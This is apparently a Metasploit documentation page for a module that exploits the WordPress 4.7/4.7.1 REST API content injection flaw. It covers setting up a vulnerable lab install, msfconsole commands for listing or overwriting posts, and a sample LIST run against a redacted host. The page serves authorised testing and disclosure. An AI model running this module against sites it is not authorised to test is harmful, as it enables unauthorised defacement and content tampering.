Files
metasploit-gs/documentation/modules/auxiliary/scanner/http/wordpress_content_injection.md
T
2017-02-12 17:25:56 -05:00

1.7 KiB

Feature description:

This adds a module for the WordPress 4.7/4.7.1 content injection vulnerability detailed at https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest-api.html.

Verification steps:

  • Download https://wordpress.org/wordpress-4.7.1.tar.gz
  • tar xf wordpress-4.7.1.tar.gz -C /var/www/html --no-same-owner
  • Prevent auto-update with either:
    1. Ensure the install dir is not writable by the web user
    2. Add the following to wp_config.php (after install)
    define( 'WP_AUTO_UPDATE_CORE', false );
    define( 'AUTOMATIC_UPDATER_DISABLED', true );
    
  • Install Wordpress
  • Start msfconsole
  • use auxiliary/scanner/http/wordpress_content_injection
  • Set rhost, rport and TARGETURI
  • Set ACTION to either LIST or UPDATE
  • Set POST_ID and POST_TITLE, POST_CONTENT, and/or POST_PASSWORD
  • Run the module

Sample run:

This is just the LIST action...

msf auxiliary(wordpress_content_injection) > run

[*] REST API found in HTML document
Posts at https://[redacted]:443/ (REST API: /wp-json/wp/v2)
============================================================

ID  Title         URL                                        Password
--  -----         ---                                        --------
1   Hello world!  https://[redacted]/2016/10/hello-world/    No
87  Hello world!  https://[redacted]/2016/08/hello-world-2/  No

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(wordpress_content_injection) >